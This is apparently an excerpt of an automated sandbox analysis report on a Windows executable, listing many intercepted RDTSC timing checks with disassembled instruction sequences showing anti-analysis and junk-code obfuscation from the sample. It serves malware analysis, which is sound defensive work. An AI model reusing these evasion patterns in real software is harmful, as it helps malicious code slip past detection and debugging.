Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1052E2B second address: 1052E3C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F78B909B0F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1053FB5 second address: 1053FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105360B second address: 1053622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B102h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1054ACF second address: 1054AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1054AD5 second address: 1054ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1054ADA second address: 1054B40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor dword ptr [ebp+12A01886h], ecx 0x00000011 mov esi, dword ptr [ebp+12A0321Ch] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F78B9095CE8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 call 00007F78B9095CF0h 0x00000038 pushad 0x00000039 mov si, ax 0x0000003c mov ecx, 41AC0F81h 0x00000041 popad 0x00000042 pop edi 0x00000043 push 00000000h 0x00000045 jp 00007F78B9095CECh 0x0000004b xchg eax, ebx 0x0000004c pushad 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1054B40 second address: 1054B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10555CD second address: 10555E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jnc 00007F78B9095CE6h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10555E2 second address: 10555ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F78B909B0F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10555ED second address: 1055651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F78B9095CE8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+12A03713h] 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F78B9095CE8h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 push 00000000h 0x00000046 jno 00007F78B9095CE6h 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f jc 00007F78B9095CE8h 0x00000055 push esi 0x00000056 pop esi 0x00000057 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1055651 second address: 105566E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F78B909B102h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 105566E second address: 1055674 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1055674 second address: 1055679 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1055EC7 second address: 1055ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10593FB second address: 1059400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1059400 second address: 105947D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F78B9095CECh 0x00000008 jnc 00007F78B9095CE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov dword ptr [ebp+12B8EDC2h], eax 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F78B9095CE8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 movsx ebx, si 0x00000038 movzx ebx, bx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F78B9095CE8h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 mov ebx, dword ptr [ebp+12A02FECh] 0x0000005d xchg eax, esi 0x0000005e jmp 00007F78B9095CF0h 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push ebx 0x00000067 jnc 00007F78B9095CE6h 0x0000006d pop ebx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 105738E second address: 1057393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 105D2D1 second address: 105D2D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1059637 second address: 105963D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 105963D second address: 1059643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1060438 second address: 106045E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F78B909B108h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 106045E second address: 106049C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F78B9095CECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ebx, ecx 0x0000000d push 00000000h 0x0000000f clc 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F78B9095CE8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c mov di, dx 0x0000002f xchg eax, esi 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 106049C second address: 10604A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 105A755 second address: 105A759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 105C4C1 second address: 105C4FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push dword ptr fs:[00000000h] 0x0000000f mov dword ptr fs:[00000000h], esp 0x00000016 and edi, 6F7129CEh 0x0000001c mov eax, dword ptr [ebp+12A00F41h] 0x00000022 and ebx, dword ptr [ebp+12A035D7h] 0x00000028 push FFFFFFFFh 0x0000002a mov di, D991h 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 jnl 00007F78B909B0F6h 0x00000038 pop eax 0x00000039 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 105C4FA second address: 105C500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 105C500 second address: 105C504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 105C504 second address: 105C508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 105A759 second address: 105A7DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jo 00007F78B909B102h 0x0000000e jmp 00007F78B909B0FCh 0x00000013 push dword ptr fs:[00000000h] 0x0000001a add edi, dword ptr [ebp+12A037C7h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F78B909B0F8h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000019h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov eax, dword ptr [ebp+12A00229h] 0x00000047 push 00000000h 0x00000049 push ebx 0x0000004a call 00007F78B909B0F8h 0x0000004f pop ebx 0x00000050 mov dword ptr [esp+04h], ebx 0x00000054 add dword ptr [esp+04h], 00000015h 0x0000005c inc ebx 0x0000005d push ebx 0x0000005e ret 0x0000005f pop ebx 0x00000060 ret 0x00000061 mov bh, al 0x00000063 push FFFFFFFFh 0x00000065 sub dword ptr [ebp+12A031ECh], ecx 0x0000006b push eax 0x0000006c jbe 00007F78B909B100h 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1064403 second address: 1064412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F78B9095CEEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 100A737 second address: 100A73C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 100A73C second address: 100A748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F78B9095CE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 106605F second address: 1066063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1066063 second address: 10660F5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F78B9095CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F78B9095CF5h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F78B9095CE8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov dword ptr [ebp+12A01A1Fh], eax 0x00000032 push 00000000h 0x00000034 mov ebx, dword ptr [ebp+12A01BAFh] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007F78B9095CE8h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000018h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 xchg eax, esi 0x00000057 jmp 00007F78B9095CF7h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jo 00007F78B9095CE8h 0x00000065 push esi 0x00000066 pop esi 0x00000067 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 106065D second address: 10606E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, edi 0x0000000b mov dword ptr [ebp+12BAFE63h], edi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov ebx, dword ptr [ebp+12A03933h] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F78B909B0F8h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov edi, 0C322F95h 0x00000044 mov eax, dword ptr [ebp+12A00ADDh] 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007F78B909B0F8h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 00000018h 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 push FFFFFFFFh 0x00000066 mov ebx, eax 0x00000068 nop 0x00000069 push eax 0x0000006a push edx 0x0000006b js 00007F78B909B0FCh 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10606E0 second address: 10606E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10606E4 second address: 10606F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B909B101h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 105F581 second address: 105F587 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 105F587 second address: 105F5A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B105h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10682FE second address: 1068313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F78B9095CF0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1068313 second address: 1068329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F78B909B0FCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1068329 second address: 10683C2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F78B9095CF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F78B9095CE8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 add edi, dword ptr [ebp+12A0283Ah] 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F78B9095CE8h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 or bx, 04EBh 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 jnc 00007F78B9095CECh 0x00000056 jp 00007F78B9095CF4h 0x0000005c popad 0x0000005d push eax 0x0000005e pushad 0x0000005f jo 00007F78B9095CECh 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1066262 second address: 1066266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 106A459 second address: 106A470 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 106177C second address: 1061786 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F78B909B0FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 106A470 second address: 106A476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10684B9 second address: 10684BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10684BD second address: 10684C7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F78B9095CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10684C7 second address: 10684D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F78B909B0F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10684D1 second address: 10684D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 106B535 second address: 106B539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 106B539 second address: 106B55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F78B9095CF7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 106B55A second address: 106B55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 106B737 second address: 106B752 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 106E399 second address: 106E39F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 106E39F second address: 106E3A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 106E3A4 second address: 106E3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1074043 second address: 1074047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1074047 second address: 1074050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1074050 second address: 1074055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10742DE second address: 10742F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F78B909B0F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F78B909B0F8h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 107A4FC second address: 107A513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 je 00007F78B9095CE6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 107A513 second address: 107A52A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B103h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 107A52A second address: 107A565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jno 00007F78B9095CE6h 0x00000016 jmp 00007F78B9095CF0h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 107F8AD second address: 107F8C1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F78B909B0F6h 0x00000008 jp 00007F78B909B0F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 107F8C1 second address: 107F8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 107FA0C second address: 107FA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 107FE3F second address: 107FE45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10803D5 second address: 10803DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10803DB second address: 10803E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10803E0 second address: 10803F9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F78B909B0FBh 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jc 00007F78B909B0F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1081B5D second address: 1081B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B9095CF1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1081B72 second address: 1081B78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1081B78 second address: 1081B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1017AD7 second address: 1017ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1017ADD second address: 1017AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
